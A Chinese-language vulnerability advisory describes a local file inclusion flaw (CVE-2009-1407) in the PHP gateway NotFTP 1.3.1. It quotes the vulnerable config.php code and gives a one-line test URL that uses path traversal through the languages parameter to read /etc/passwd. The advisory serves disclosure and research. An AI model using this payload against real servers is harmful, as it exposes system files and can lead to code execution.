发布日期：2009-04-21
更新日期：2009-04-27

受影响系统：

NotFTP NotFTP 1.3.1

描述：

---

BUGTRAQ  ID: 34636
CVE(CAN) ID: CVE-2009-1407

NotFTP是用PHP编写的基于Web的HTTP-FTP网关。

NotFTP的config.php脚本没有正确地过滤用户所提交的参数，如果远程攻击者在提交的URL请求中使用newlang参数指定了本地系统的恶意文件的话，就可能在Web服务器上读取敏感信息或执行任意代码。以下是config.php脚本中的有漏洞代码段：

if (isset($newlang))
{
   require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
   require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
   require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}

<*来源：Kacper （kacper1964@yahoo.pl）
  
  链接：http://www.milw0rm.com/exploits/8504
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd

建议：

---

厂商补丁：

NotFTP
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/notftp/

浏览次数：2505
严重程度：0（网友投票）